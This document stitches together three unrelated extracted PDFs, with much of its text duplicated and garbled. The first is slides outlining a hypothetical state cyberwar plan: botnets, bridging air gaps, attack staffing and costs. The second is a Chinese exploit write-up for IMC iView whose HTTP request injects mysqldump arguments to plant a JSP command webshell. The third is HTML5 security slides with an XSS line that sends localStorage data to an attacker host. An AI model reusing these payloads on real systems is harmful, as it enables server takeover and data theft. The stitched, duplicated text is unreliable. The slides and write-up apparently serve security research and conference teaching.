from/paying cyber criminals for access Insider backdoors, i.e. employees at MS, Cisco, etc Insider backdoors, i.e. employees at MS, Cisco, etc Potential Cyberwar Attacks Potential Cyberwar Attacks Potential Cyberwar Attacks Potential Cyberwar Attacks Shut down the Internet Shut down the Internet Take financial markets offline, corrupt or destroy Take financial markets offline, corrupt or destroy financial data financial data Disrupt shipping, air transportation Disrupt shipping, air transportation Blackouts Blackouts Disable communication within military Disable communication within military Disable cell phone networks Disable cell phone networks Cyberarmy tasks Cyberarmy tasks Cyberarmy tasks Cyberarmy tasks Communication redundancy Communication redundancy Distributed Denial of Service Distributed Denial of Service Hard targets Hard targets Core infrastructure Core infrastructure Attacking air gapped networks Attacking air gapped networks Communication Communication redundancy redundancy Operators will be geographically distributed Operators will be geographically distributed Offices throughout the world Offices throughout the world Multiple offices in target country Multiple offices in target country Direct, redundant communication possible to command Direct, redundant communication possible to command Modems over phone lines, satellite phones Modems over phone lines, satellite phones Even without the Internet, attacks against the Even without the Internet, attacks against the Internet can be commanded and controlled Internet can be commanded and controlled DDOS DDOS Flood target with too much traffic Flood target with too much traffic Deny DNS, bandwidth to server, server(s) themselves Deny DNS, bandwidth to server, server(s) themselves Need to control (and coordinate) a large number of Need to control (and coordinate) a large number of hosts to perform this attack hosts to perform this attack BTW, North Korea functions just fine if the Internet BTW, North Korea functions just fine if the Internet goes away goes away Collecting hosts Collecting hosts Assume ownership of existing botnets Assume ownership of existing botnets Use client side vulnerabilities Use client side vulnerabilities Browsers, Flash, Reader, Java, etc Browsers, Flash, Reader, Java, etc Make some effort to clean up existing malware, patch Make some effort to clean up existing malware, patch systems systems Other botnet masters may try to take your bots Other botnet masters may try to take your bots Use only known vulnerabilities Use only known vulnerabilities Don Don’’t waste the 0 t waste the 0--days, unless you have extras days, unless you have extras The N. Korean Botnets The N. Korean Botnets Want to avoid Want to avoid ““string which unravels all string which unravels all”” Develop a large number of different varieties of bot Develop a large number of different varieties of bot software software Avoid central control Avoid central control Bots should be geographically diverse Bots should be geographically diverse Saturated in target country Saturated in target country Regionally diverse in target country Regionally diverse in target country at least 100x bigger than largest botnet seen at least 100x bigger than largest botnet seen Multiple botnets with Multiple botnets with diversity diversity Hard Targets Hard Targets ““Hard Hard”” targets targets Large corporations Large corporations Banking and Financial Services Banking and Financial Services Air traffic controls Air traffic controls NIPRNET NIPRNET Employ multiple security mechanisms, many distinct security Employ multiple security mechanisms, many distinct security regions in network, dedicated security teams regions in network, dedicated security teams Botnet size figures suggest there are no Botnet size figures suggest there are no ““hard hard”” targets! targets! Attacking Hard Targets Attacking Hard Targets Need a dedicated, patient attack. Pentesting 101 Need a dedicated, patient attack. Pentesting 101 Step 1: get a foothold Step 1: get a foothold Research target network and users Research target network and users Can track victims with GSM information (SOURCE Boston Can track victims with GSM information (SOURCE Boston talk) talk) Examine social networks of users Examine social networks of users Get inside help, infiltrate or buy access Get inside help, infiltrate or buy access Send targets emails with malware/links to 0 Send targets emails with malware/links to 0--day exploits day exploits Maybe you already control some trusted nodes via the botnet Maybe you already control some trusted nodes via the botnet More Hard Targets More Hard Targets Spread Spread Record keystrokes, sniff packets, map network, analyze intranet Record keystrokes, sniff packets, map network, analyze intranet services services Slowly take over the entire local network Slowly take over the entire local network Learn how they make changes, what intranet sites they use, Learn how they make changes, what intranet sites they use, monitor emails, crack all passwords monitor emails, crack all passwords Use client side attacks, observe VPN, SSH usage Use client side attacks, observe VPN, SSH usage Install RATs on systems, different RATs for different hard Install RATs on systems, different RATs for different hard targets targets Become so Become so--called called ““Advanced Persistent Threat Advanced Persistent Threat”” Core Infrastructure Core Infrastructure Targets: Core routers, DNS servers Targets: Core routers, DNS servers Attacks Attacks DDOS DDOS Poisoning routing tables Poisoning routing tables Gain access via Gain access via ““hard target hard target”” approach approach DOS attacks against vulnerabilities in routers, DOS attacks against vulnerabilities in routers, servers servers Cisco IOS, JunOS, BIND, MS DNS Cisco IOS, JunOS, BIND, MS DNS Air gapped systems Air gapped systems The most secure systems are The most secure systems are ““air gapped air gapped”” from the from the Internet (or at least are supposed to be) Internet (or at least are supposed to be) DOD TS//SI network DOD TS//SI network Electric power grid Electric power grid Air traffic control? Air traffic control? These can still be remotely attacked, but difficult These can still be remotely attacked, but difficult JWICS was compromised by USB JWICS was compromised by USB Un Un--airgapping airgapping The easiest solution is to put these networks back on the The easiest solution is to put these networks back on the Internet Internet Have an operative stick a 3g modem and a RAT on a Have an operative stick a 3g modem and a RAT on a computer/device on the network computer/device on the network ...or add a whole new device to network ...or add a whole new device to network Or a satellite phone Or a satellite phone Or a modem over existing phone lines Or a modem over existing phone lines if tempest shielding is a problem if tempest shielding is a problem Cyberwar defenses Cyberwar defenses Cyberwar Defenses Cyberwar Defenses Target country can take defensive actions during or in Target country can take defensive actions during or in advance to a cyber attack advance to a cyber attack Segregation (i.e. disconnect from the Internet) Segregation (i.e. disconnect from the Internet) Deploy large scale IDS/IPS systems Deploy large scale IDS/IPS systems Akami Akami--like DOS protection of critical systems like DOS protection of critical systems Airgap sensitive networks Airgap sensitive networks Segregation Segregation Target country can isolate itself from the Internet to Target country can isolate itself from the Internet to protect itself from foreign attack protect itself from foreign attack Country may install aggressive filters on foreign Country may install aggressive filters on foreign inbound traffic inbound traffic By positioning botnet hosts and making operations in By positioning botnet hosts and making operations in-- country, the attack can still occur country, the attack can still occur Filtering Filtering Target country may use filtering on Internet traffic Target country may use filtering on Internet traffic IDS, IPS, etc IDS, IPS, etc All botnet clients and their communications are custom All botnet clients and their communications are custom written, so no signatures will exist written, so no signatures will exist All RATs and their communications are custom written, All RATs and their communications are custom written, so no signatures will exist so no signatures will exist Redundancy of bots and RATS ensure if one is Redundancy of bots and RATS ensure if one is detected, attack can continue from remaining ones detected, attack can continue from remaining ones Akami Akami--like defenses like defenses Akami works by mirroring and caching content in multiple, Akami works by mirroring and caching content in multiple, physically diverse locations physically diverse locations Akami delivers content close to the requester Akami delivers content close to the requester Target may use Akami itself, or develop similar approach to Target may use Akami itself, or develop similar approach to try to stop DDOS attack against critical infrastructure try to stop DDOS attack against critical infrastructure Our botnet is physically diverse so will have many nodes Our botnet is physically diverse so will have many nodes close to each Akami server close to each Akami server Our botnet should be large enough to overwhelm even Our botnet should be large enough to overwhelm even distributed service distributed service Airgapped systems Airgapped systems Target country may physically separate critical Target country may physically separate critical infrastructure (utilities, financial networks, military infrastructure (utilities, financial networks, military systems) systems) Some systems cannot be airgapped (e Some systems cannot be airgapped (e--commerce) commerce) In advance, we try to un In advance, we try to un--airgap the systems we target airgap the systems we target The Cyberarmy The Cyberarmy Job roles Job roles Numbers and cost per role Numbers and cost per role Equipment Equipment Total cost Total cost Job roles Job roles Vulnerability Analysts Vulnerability Analysts Exploit developers Exploit developers Bot collectors Bot collectors Bot maintainers Bot maintainers Operators Operators Remote personnel Remote personnel Developers Developers Testers Testers Technical consultants Technical consultants Sysadmins Sysadmins Managers Managers Vulnerability analysts Vulnerability analysts Bug hunters, find vulnerabilities in software via fuzzing and st Bug hunters, find vulnerabilities in software via fuzzing and static atic analysis analysis Need to be world class, hard to Need to be world class, hard to ““grow grow”” this talent this talent Try to hire up all the best people Try to hire up all the best people Find bugs in client side applications (browsers) as well as Find bugs in client side applications (browsers) as well as servers (DNS, HTTP) and networking equipment, smart phones servers (DNS, HTTP) and networking equipment, smart phones Find bugs in kernels for sandbox escape and privilege escalation Find bugs in kernels for sandbox escape and privilege escalation As needed, exploitable or DOS bugs As needed, exploitable or DOS bugs Exploit developers Exploit developers Turn vulnerabilities into highly reliable exploits Turn vulnerabilities into highly reliable exploits For both 0 For both 0--day and known vulnerabilities day and known vulnerabilities This used to be easy, but now takes a tremendous This used to be easy, but now takes a tremendous amount of skill amount of skill Will need to be able to write exploits for various Will need to be able to write exploits for various platforms: Windows, Mac OS X, Linux platforms: Windows, Mac OS X, Linux Will need to be able to defeat latest anti Will need to be able to defeat latest anti--exploitation exploitation measures, ALSR, DEP, sandboxing measures, ALSR, DEP, sandboxing Bot collectors Bot collectors Responsible for using client side exploits to take over Responsible for using client side exploits to take over and install bots on as many computers and devices and install bots on as many computers and devices as possible as possible Mostly use exploits based on known exploits, some 0 Mostly use exploits based on known exploits, some 0-- day usage day usage Deliver exploits via spam, advertising banners, Deliver exploits via spam, advertising banners, malware malware Maintain and monitor exploit servers Maintain and monitor exploit servers Bot maintainers Bot maintainers Collection of bot machines will constantly be changing Collection of bot machines will constantly be changing Some will die, be reinstalled, etc Some will die, be reinstalled, etc Others will be added Others will be added Monitor size and health of botnets, as well as geographic Monitor size and health of botnets, as well as geographic diversity inside and outside target country diversity inside and outside target country Test botnets Test botnets Make efforts to maintain bots by keeping the systems on Make efforts to maintain bots by keeping the systems on which they reside patched, removing other malware, if which they reside patched, removing other malware, if possible possible Operators Operators Actively exploiting hard targets (elite pen testers) Actively exploiting hard targets (elite pen testers) Advanced usage of exploits, mostly 0 Advanced usage of exploits, mostly 0--day day Need to understand entire target network and be able Need to understand entire target network and be able to passively and actively scan and enumerate to passively and actively scan and enumerate network network Install RATs, monitor keystrokes and communications Install RATs, monitor keystrokes and communications to expand reach in network to expand reach in network Remote personnel Remote personnel Responsible for setting up operations around the Responsible for setting up operations around the world world Getting jobs, access to airgapped systems Getting jobs, access to airgapped systems Installing, monitoring, and testing un Installing, monitoring, and testing un--airgapping airgapping devices devices Developers Developers Need to develop a variety of bots with differing Need to develop a variety of bots with differing communication methods communication methods Need to develop a variety of RATs Need to develop a variety of RATs Develop tools to aid other personnel Develop tools to aid other personnel Requires user and kernel level development on a Requires user and kernel level development on a variety of platforms variety of platforms Testers Testers Test exploits, RATs, and bots for functionality, Test exploits, RATs, and bots for functionality, reliability reliability Run all tools/exploits against a variety of anti Run all tools/exploits against a variety of anti--virus, virus, IDS, IPS, to ensure stealth IDS, IPS, to ensure stealth Technical consultants Technical consultants These are experts in various domain specific and These are experts in various domain specific and obscure hardware and software systems obscure hardware and software systems SCADA engineers SCADA engineers Medical device experts Medical device experts Aviation scheduling experts Aviation scheduling experts etc etc Sysadmins Sysadmins Keep systems running, updated Keep systems running, updated Install software, clients and target software Install software, clients and target software Manage test networks and systems Manage test networks and systems Number and Cost per role Number and Cost per role Vulnerability Analysts Vulnerability Analysts Exploit developers Exploit developers Bot collectors Bot collectors Bot maintainers Bot maintainers Operators Operators Remote personnel Remote personnel Developers Developers Testers Testers Technical consultants Technical consultants Sysadmins Sysadmins Managers Managers Some info about costs Some info about costs I only factor in hardware, software, and personnel I only factor in hardware, software, and personnel salaries salaries I do not include I do not include Building rent, utilities, travel Building rent, utilities, travel support staff: Electricians, janitors, guards... support staff: Electricians, janitors, guards... ““Spys Spys”” Intelligence analysts Intelligence analysts Health insurance, retirements, other benefits Health insurance, retirements, other benefits Some risk in this job Some risk in this job I pay slightly inflated salaries to compensate for this I pay slightly inflated salaries to compensate for this risk risk Could start many small companies (or contract out to Could start many small companies (or contract out to existing companies) such than no one group knew existing companies) such than no one group knew what was going on what was going on Plus this is better opsec, if all the sudden all known Plus this is better opsec, if all the sudden all known security researchers disappeared, people would get security researchers disappeared, people would get worried! worried! Vulnerability analysts Vulnerability analysts Level 1: 10 Level 1: 10 Well known, world class experts Well known, world class experts $250,000/yr $250,000/yr Level 2: 10 Level 2: 10 College level CS majors College level CS majors $40,000/yr $40,000/yr Total: $2,900,000 Total: $2,900,000 Exploit developers Exploit developers Level 1: 10 Level 1: 10 World class experts: devise generic ways to beat anti World class experts: devise generic ways to beat anti--exploitation, write exploits exploitation, write exploits $250k $250k Level 2: 40 Level 2: 40 Prolific Metasploit contributors: write exploits Prolific Metasploit contributors: write exploits $100k $100k Level 3: 20 Level 3: 20 College level CS majors College level CS majors $40k $40k Total: $7,300,000 Total: $7,300,000 Bot collectors Bot collectors Level 1: 50 Level 1: 50 BS or Masters in CS BS or Masters in CS $75k $75k Level 2: 10 Level 2: 10 College level CS majors College level CS majors $40k $40k Total: $4,150,000 Total: $4,150,000 Bot maintainers Bot maintainers Level 1: 200 Level 1: 200 BS in CS BS in CS $60k $60k Level 2: 20 Level 2: 20 CS majors CS majors $45k $45k Total: $12,900,000 Total: $12,900,000 Operators Operators Level 1: 50 Level 1: 50 Experienced, skilled penetration testers Experienced, skilled penetration testers $100k $100k Level 2: 10 Level 2: 10 CS Majors CS Majors $40k $40k Total: $5,400,000 Total: $5,400,000 Remote personnel Remote personnel Level 1: 10 Level 1: 10 Experienced spys Experienced spys Pay comes from spy agency Pay comes from spy agency Level 2: 10 Level 2: 10 CS Majors CS Majors $40k $40k Total: $400,000 Total: $400,000 Developers Developers Level 1: 10 Level 1: 10 Experienced Kernel developers Experienced Kernel developers $125k $125k Level 2: 20 Level 2: 20 BS in CS BS in CS $60k $60k Level 3: 10 Level 3: 10 CS Majors CS Majors $40k $40k Total: $2,850,000 Total: $2,850,000 Testers Testers Level 1: 10 Level 1: 10 BS in CS BS in CS $60k $60k Level 2: 5 Level 2: 5 CS Majors CS Majors $40k $40k Total: $800,000 Total: $800,000 Others Others Technical consultants Technical consultants 20 at 100k fee 20 at 100k fee $2mil $2mil Sysadmins Sysadmins 10 at 50k 10 at 50k $500,000 $500,000 Managers Managers 1 for every 10 people, 1 for every 10 mangers 1 for every 10 people, 1 for every 10 mangers 52 managers (@100k), 5 senior managers (@200k) 52 managers (@100k), 5 senior managers (@200k) $6.2mil $6.2mil Equipment Equipment Hardware Hardware Average of 2 computers per person Average of 2 computers per person Exploitation/Testing lab with 50 computers, variety of routers Exploitation/Testing lab with 50 computers, variety of routers and network equipment, smartphones, etc and network equipment, smartphones, etc Software Software MSDN subscription, IDA Pro, Hex Rays, Canvas, Core Impact, MSDN subscription, IDA Pro, Hex Rays, Canvas, Core Impact, 010 editor, Bin Navi, etc 010 editor, Bin Navi, etc Remote exploitation servers Remote exploitation servers Eh, we Eh, we’’ll just use some owned boxes ll just use some owned boxes The army The army 592 people 592 people $45.9 mil in annual salary $45.9 mil in annual salary Average annual salary $77,534 Average annual salary $77,534 $3 mil in equipment $3 mil in equipment Pie charts! Pie charts! Bot maintiners Bot maintiners Exploit dev Exploit dev Operators Operators A 2 year projection A 2 year projection First 3 months First 3 months Remote personnel set up stations Remote personnel set up stations Remote personnel try to get jobs in financial industry, Remote personnel try to get jobs in financial industry, airlines, and electrical/nuclear industries, join military airlines, and electrical/nuclear industries, join military Vulnerability analysts start looking for bugs Vulnerability analysts start looking for bugs Exploit developers write and polish (known) browser Exploit developers write and polish (known) browser exploits for bot collection exploits for bot collection Developers write bot software, RATS Developers write bot software, RATS Hard targets identified and researched Hard targets identified and researched Months 3 Months 3--66 A couple of exploitable 0 A couple of exploitable 0--days and some DOS bugs days and some DOS bugs are discovered are discovered Exploit developers begin writing 0 Exploit developers begin writing 0--day exploits day exploits Bot collection begins Bot collection begins Hard targets research continues, social networks Hard targets research continues, social networks joined, emails exchanged, joined, emails exchanged, ““trust trust”” established established Months 6 Months 6--99 With 0 With 0--days in hand, hard target beach heads are days in hand, hard target beach heads are established established Bot collection and clean Bot collection and clean--up continues up continues 500k hosts compromised (a small botnet by 500k hosts compromised (a small botnet by cybercriminal standards) cybercriminal standards) Remote stations operational, communication Remote stations operational, communication redundant redundant Developers writing additional bots and tools Developers writing additional bots and tools After 1 year After 1 year Control over some systems in hard targets Control over some systems in hard targets System of bots continues to grow System of bots continues to grow 5 million hosts (large botnet by cybercriminal 5 million hosts (large botnet by cybercriminal standards) standards) 00--day exploits available for many browser/OS day exploits available for many browser/OS combinations, some smartphones combinations, some smartphones Inside access to critical military, financial, and utilities Inside access to critical military, financial, and utilities achievied achievied 1 year 6 months 1 year 6 months Most hard targets thoroughly compromised Most hard targets thoroughly compromised It would be hard to ever lose control over these networks, It would be hard to ever lose control over these networks, even if detected even if detected System of bots continues to grow System of bots continues to grow 100 million hosts 100 million hosts 00--day exploits available for all browser/OS combinations, day exploits available for all browser/OS combinations, DOS conditions known for BIND, many Cisco IOS DOS conditions known for BIND, many Cisco IOS configurations configurations Control of many airgapped systems Control of many airgapped systems 2 years 2 years All hard targets thoroughly compromised All hard targets thoroughly compromised System of bots continues to grow System of bots continues to grow 500 million hosts (20% personal computers), many 500 million hosts (20% personal computers), many smart phones smart phones Airgapped and critical systems thoroughly controlled Airgapped and critical systems thoroughly controlled Attack! Attack! Financial data altered Financial data altered Military and government networks debilitated Military and government networks debilitated Utilities affected, blackouts ensue Utilities affected, blackouts ensue Ticket booking and air traffic control systems offline Ticket booking and air traffic control systems offline DOS launched against root DNS servers DOS launched against root DNS servers BGP routes altered BGP routes altered Phone system jammed with calls from owned smartphones Phone system jammed with calls from owned smartphones North Korea wins! North Korea wins! Conclusions Conclusions Lessons learned Lessons learned With some dedication, patience, and skilled attackers With some dedication, patience, and skilled attackers there is not much defense that is possible there is not much defense that is possible ItIt’’s an offensive game, although perhaps I s an offensive game, although perhaps I’’m biased m biased Its more about people than equipment (94% of my Its more about people than equipment (94% of my cost is for salaries) cost is for salaries) Taking down the target Taking down the target’’s Internet without taking down s Internet without taking down your own would be harder but possible (not a problem your own would be harder but possible (not a problem here) here) Lessons learned (cont) Lessons learned (cont) A lot of talk concerning software and hardware A lot of talk concerning software and hardware backdoors in the media backdoors in the media North Korea can North Korea can’’t easily do this, and this attack suffers t easily do this, and this attack suffers from being hard to carry out and largely unnecessary from being hard to carry out and largely unnecessary Cyberwar is still aided by humans being located around Cyberwar is still aided by humans being located around the world and performing covert actions the world and performing covert actions Can Can’’t have all the cyber warriors in a bunker at Fort t have all the cyber warriors in a bunker at Fort Meade Meade What about defense? What about defense? Defender can use the buildup period to try to detect and Defender can use the buildup period to try to detect and eliminate cyberwar presense eliminate cyberwar presense Best defense is to eliminate vulnerabilities in software Best defense is to eliminate vulnerabilities in software Best way to do that is to hold software vendors liable for Best way to do that is to hold software vendors liable for the damage caused by the vulnerabilities in their software the damage caused by the vulnerabilities in their software Currently there is no financial incentive for companies to Currently there is no financial incentive for companies to produce vulnerability free software produce vulnerability free software Building in security costs them money and doesn Building in security costs them money and doesn’’t provide t provide them anything in return them anything in return Thanks to Thanks to Early draft readers Early draft readers Dino Dai Zovi Dino Dai Zovi Dave Aitel Dave Aitel Jose Nazario Jose Nazario Dion Blazakis Dion Blazakis Dan Caselden Dan Caselden Twitter people who gave comments Twitter people who gave comments Questions? Questions? Contact me at Contact me at cmiller@securityevaluators.com cmiller@securityevaluators.com
pdf
Author:@Y4er.com 调用关系查询 分析 com.imc.iview.network.NetworkServlet#doPost 两次校验 com.imc.iview.utils.CUtils#checkFileNameIncludePath(java.lang.String) MATCH (n:Class{NAME:'javax.servlet.http.HttpServlet'})-[:EXTEND]-(c:Class)- [:HAS]->(m:Method)-[:CALL*2]- (m1:Method{NAME:'exec',CLASS_NAME:'java.lang.Runtime'}) return * 检验 \webapps\ 防止写shell com.imc.iview.utils.CUtils#checkSQLInjection 检测了一些关键字。 public boolean checkSQLInjection(String model0) {    boolean result = false;    String model = model0.toLowerCase();    if (!model.contains(" or ") && !model.contains("'or ") && !model.contains("||") && !model.contains("==") && !model.contains("--")) {        if (model.contains("union") && model.contains("select")) {            if (this.checkCommentStr(model, "union", "select")) {                result = true;           }       } else if (model.contains("case") && model.contains("when")) {            if (this.checkCommentStr(model, "case", "when")) {                result = true;           }       } else if (model.contains("into") && model.contains("dumpfile")) {            if (this.checkCommentStr(model, "into", "dumpfile")) {                result = true;           }       } else if (model.contains("into") && model.contains("outfile")) {            if (this.checkCommentStr(model, "into", "outfile")) {                result = true;           }       } else if (model.contains(" where ") && model.contains("select ")) {            result = true;       } else if (model.contains("benchmark")) {            result = true;       } else if (model.contains("select") && model.contains("from")) {            if (this.checkCommentStr(model, "select", "from")) {                result = true;           }       } else if (model.contains("select/*")) {            result = true;       } else if (model.contains("delete") && model.contains("from")) {            if (this.checkCommentStr(model, "delete", "from")) {                result = true;           }       } else if (model.contains("drop") && model.contains("table") || model.contains("drop") && model.contains("database")) {            if (this.checkCommentStr(model, "drop", "table")) {                result = true;           }            if (this.checkCommentStr(model, "drop", "database")) { 那么mysqldump可以拼接 -w 参数将内容写入文件,然后可以多次传递 -r 参数覆盖原有的 -r 文件路径值 正常的命令为 命令注入构造payload                result = true;           }       } else if (!model.contains("sleep(") && !model.contains(" rlike ") && !model.contains("rlike(") && !model.contains(" like ")) {            if (model.startsWith("'") && model.endsWith("#") && model.length() > 5) {                result = true;           } else if ((model.startsWith("9999'") || model.endsWith("#9999") || model.contains("#9999")) && model.length() > 10) {                result = true;           } else if (model.contains("getRuntime().exec") || model.contains("getruntime().exec") || model.contains("getRuntime()")) {                result = true;           }       } else {            result = true;       }   } else {        result = true;   }    if (result) {        System.out.println("Error: SQL Injection Vulnerability detected in [" + model0 + "]");   }    return result; } "C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMCTrapService\backup\aa" 2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStre am((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[] {99,109,100}))).start()).getInputStream()))%>" 拼接之后为 有php日志getshell的那味了。 修复 判断session登录状态 文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。 POST /iView3/NetworkServlet HTTP/1.1 Host: 172.16.16.132:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 79 page_action_type=backupDatabase&backup_filename=2.sql"+- r+"./webapps/iView3/test.jsp"+-w+" <%25%3dnew+String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBy tesFromStream((new+ProcessBuilder(request.getParameter(new+java.lang.String(new+ byte[]{99,109,100}))).start()).getInputStream()))%25>" "C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMCTrapService\backup\2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStre am((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[] {99,109,100}))).start()).getInputStream()))%>"
pdf
Abusing  HTML5 DEF  CON  19 Ming  Chow Lecturer,  Department  of  Computer  Science TuCs  University Medford,  MA  02155 mchow@cs.tuCs.edu What  is  HTML5? •  The  next  major  revision  of  HTML.  To  replace  XHTML?  Yes •  Close  enough  to  a  full-­‐fledged  development  environment •  The  three  aspects  of  HTML5: –  Content  (HTML) –  PresentaYon  of  content  (CSS) –  InteracYon  with  content  (JavaScript) •  S"ll  work  in  progress •  Backing  from  Google,  MicrosoC,  and  of  course  Apple •  Currently  supported  (not  100%)  in  Chrome,  Firefox  3.5+,  Opera, Internet  Explorer  8,  and  Safari •  Many  incompaYbiliYes  exist;  perform  a  browser  test  via hdp://www.html5test.com •  Will  be  flexible  with  error  handling  (i.e.,  incorrect  syntax).  Older browsers  will  safely  ignore  the  new  HTML5  syntax. HTML5:  What’s  In?  What’s  Out? •  In: –  New  tags,  including  <button>,  <video>,  <audio>,  <article>,  <footer>,  <nav> –  New  adributes  for  tags  such  as  autocomplete,  autofocus,  pattern  (yes,  regex)  for input –  New  media  events –  New  <canvas>  tag  for  2D  rendering –  New  form  controls  for  date  and  Yme –  GeolocaYon –  New  selectors –  Client-­‐side  storage  including  localStorage,  sessionStorage,  and  Web  SQL •  Out: –  PresentaYon  elements  such  as  <font>,  <center> –  PresentaYon  adributes  including  align,  border –  <frame>,  <frameset> –  <applet> –  Old  special  effects:  <marquee>,  <bgsound> –  <noscript> Quick  Demos •  Video  capYoning •  Canvas •  GeolocaYon Structure  of  an  HTML5  Document <!DOCTYPE html> <html> <head> <title>An HTML Document</title> ... ... ... </head> <body> <p>Everything that you practically know of stays the same</p> ... ... </body> </html> Areas  of  Concern •  The  adack  surface:  client-­‐side •  Client-­‐side  and  offline  storage –  No  longer  just  cookies  and  sessions –  Compared  to  cookies  and  sessions,  allows  for  greater  amount  of data  to  be  stored –  What  if  client's  database  synchronizes  with  producYon  database on  server  and  client's  database  contains  malicious? •  Cross-­‐origin  JavaScript  requests •  Sending  messages  from  one  document  to  another  (on another  domain) •  Holy  smokes,  background  computaYonal  power! •  The  complexity  of  HTML5  making  the  browser  worse localStorage  and sessionStorage •  Provides  key-­‐value  mappings  (currently,  string-­‐to-­‐string  mappings) •  Very  much  like  cookies. •  Differences: –  Cookies  =>  4  KB;  localStorage  =>  depends  on  browser  (usually  in  MB) –  Unlike  cookies,  sessionStorage  and  localStorage  data  are  NOT  sent  to server! –  sessionStorage  data  confined  to  browser  window  that  it  was  created  in,  lasts unYl  browser  is  closed –  localStorage  has  longer  persistence,  can  last  even  aCer  browser  is  closed •  Trivial  to  use: –  (localStorage | sessionStorage).setItem() –  (localStorage | sessionStorage).getItem() –  (localStorage | sessionStorage).deleteItem() •  Or  use  associaYve  array  syntax  for  localStorage  or sessionStorage Hardly  Any  Security  with  localStorage or  sessionStorage •  If  you  have  an  XSS  vulnerability  in  your  applicaYon, anything  stored  in  localStorage  is  available  to an  adacker. •  Example:  <script>document.write("<img src='http://attackersite.com? cookie="+localStorage.getItem('phras e')+"'>");</script> •  Never  a  good  idea  to  use  store  sensiYve  data  locally. •  Someone  with  access  to  your  machine  can  read everything  (via  Chrome  Developer  Tools  or  Firebug) Web  SQL •  Brings  SQL  to  the  client-­‐side •  Not  new:  see  Google  Gears •  Core  methods: –  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size"); –  transaction("YOUR SQL STATEMENT HERE"); –  executeSql(); •  Prepared  statements  supported •  The  usual  gang  of  adacks:  XSS,  SQL  injecYon •  Demos Web  SQL  (conYnued) •  The  usual  gang  of  prevenYons: –  Use  prepared  statements –  Output  encoding  (before  storing  data  and  aCer  fetching data) •  New  wrenches: –  Do  not  store  sensiYve  data  in  client-­‐side  database –  Like  localStorage  and  sessionStorage,  someone with  access  to  your  machine  can  read  everything  (via Chrome  Developer  Tools  or  Firebug) –  Can  you  really  trust  what  is  stored  on  client-­‐side  database? –  Create  database  and  store  data  over  SSL –  Ask  user  for  permission  before  creaYng  and  storing  local database ApplicaYon  Cache •  Useful  for  offline  browsing,  speed,  and  reduce  server  load •  The  size  limit  for  cached  data  for  a  site:  5  MB •  Example  1A,  enabling  applicaYon  cache: <html manifest="example.manifest"> … </html> •  Example  1B,  the  manifest  file  (example.manifest): CACHE MANIFEST # 2010-06-18:v2 # Explicitly cached entries CACHE: index.html stylesheet.css images/logo.png scripts/main.js ApplicaYon  Cache  (conYnued) •  Example  2,  updaYng  ApplicaYon  Cache: applicationCache.addEventListener('checking', updateCacheStatus, false); Poisoning  the  ApplicaYon  Cache •  Any  website  can  create  a  cache  on  the  user's computer •  No  permission  required  before  allowing  a  site  to create  an  applicaYon  cache  in  Chrome  or  Safari •  Any  file  can  be  cached  including  the  root  file  "/" •  The  catch:  even  if  a  root  resource  is  cached normally  and  on  refresh,  the  normal  cache  is updated  but  not  the  ApplicaYon  Cache •  Read: hdp://blog.andlabs.org/2010/06/chrome-­‐and-­‐ safari-­‐users-­‐open-­‐to-­‐stealth.html Cross-­‐Origin  JavaScript  Requests  (or Cross-­‐Origin  Resource  Sharing) •  Not  directly  part  of  HTML5  but  introduced  by  W3C •  XDomainRequest()  created  by  MicrosoC  in  Internet  Explorer  8 •  In  some  cases,  XMLHttpRequest()  now  allow  cross-­‐domain requests  (Firefox  3.5+  and  Safari  4+) •  Caveat:  consent  between  web  page  and  the  server  is  required. –  Server  must  respond  with  an  Access-Control-Allow-Origin  header  of either  *  (a.k.a.,  universal  allow,  not  good!)  or  the  exact  URL  of  the  requesYng  page (site-­‐level;  white-­‐list) –  Example  1  (BAD!):  header('Access-Control-Allow-Origin: *'); –  Example  2  (BAD!):  Access-Control-Allow-Origin: http:// allowed.origin/page?cors=other.allowed.origin %20malicious.spoof •  ResoluYons: –  Add  some  form  of  authenYcaYon  /  credenYals  checking  (e.g.,  cookie) –  Validate  response Cross-­‐Document  Messaging •  Establish  a  communicaYon  channel  between  frames  in  different  origins •  Requires  sender  and  receiver •  Sender:  window.postMessage("message", "targetOrigin"); •  Demo •  Watch  out!  If  you  are  the  receiver  of  a  message  from  another  site,  verify  the sender's  idenYty  using  the  origin  property.  Example  (receiver): window.addEventListener("message", receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org") { … … … } } Web  Workers •  Very  powerful  stuff;  allows  background  computaYonal  tasks  via JavaScript  -­‐-­‐think  threads •  Really  simple:  instanYate  a  Worker  object  in  JavaScript •  Example:  var w = new Worker("some_script.js"); •  w.onmessage = function(e) { // do something }; •  To  terminate  a  worker:  w.terminate(); •  Caveat:  web  workers  cannot  run  locally  (i.e.,  file:///) •  Same-­‐origin  security  principle  applies •  Things  that  a  worker  have  access  to:  XHR,  navigator  object,  applicaYon cache,  spawn  other  workers! •  Things  that  a  worker  does  not  have  access  to:  DOM,  window,  document objects •  What  you  could  do  with  a  worker:  use  your  wildest  imaginaYon… But  What  About  the  New  HTML5  Tags and  Adributes? •  Depends  on  browser,  spec  of  codec  or  format •  NaYve  audio  and  video  rendering  (read:  <video>  and  <audio>).  What  if  there are  flaws  in  the  codec? •  On  some  browsers  (e.g,  Firefox  <  4),  you  can  embed  JavaScript  as  value  of  on  error adribute  of  <video>  or  <audio>  with  <source> •  Example:  <audio onerror="javascript:alert('ugh!')"><source src="uhoh.mp3" /></audio> •  Heap  buffer  overflow  via  transformaYons  and  painYng  in  HTML5  canvas  in  Opera. hdp://www.opera.com/support/kb/view/966/  